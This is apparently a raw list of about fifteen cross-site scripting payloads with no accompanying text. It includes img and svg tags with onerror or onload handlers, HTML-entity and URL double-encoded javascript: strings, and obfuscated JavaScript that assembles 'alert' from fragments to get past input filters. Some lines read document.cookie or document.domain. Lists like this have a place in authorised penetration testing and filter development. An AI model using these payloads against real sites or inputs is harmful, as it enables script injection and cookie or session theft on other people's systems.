<iframe srcdoc="<img src=x onerror=alert(document.cookie)>"></iframe>
onerror="&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;&#41;"
"><Svg/OnLoad=alert(1)>"@gmail.com
<A HRef=\" AutoFocusOnFocus=top/**/?.['al'%2B'ert'](1)>
</script>'"><img src=x onError=prompt(1)>
</script>%27"><img%20src=x%20onError=prompt(1)>
'<00 foo="<a%20href="javascript​:alert('XSS-Bypass')">XSS-CLick</00>--%20/
%2527%2520onfocus%253D%2527alert%25281%2529%2527%2520autofocus%253D%2527
(function(x){this[x+`ert`](1)})`al`
window[`al`+/e/[`ex`+`ec`]`e`+`rt`](2)
document['default'+'View'][`\u0061lert`](3)
this.ownerDocument.defaultView['\u0061lert'](4)
confirm?.(1)
<img src=”invalid-image” onerror=”alert(document.cookie)”>
%3CSVG/oNlY=1%20ONlOAD=confirm(document.domain)%3E
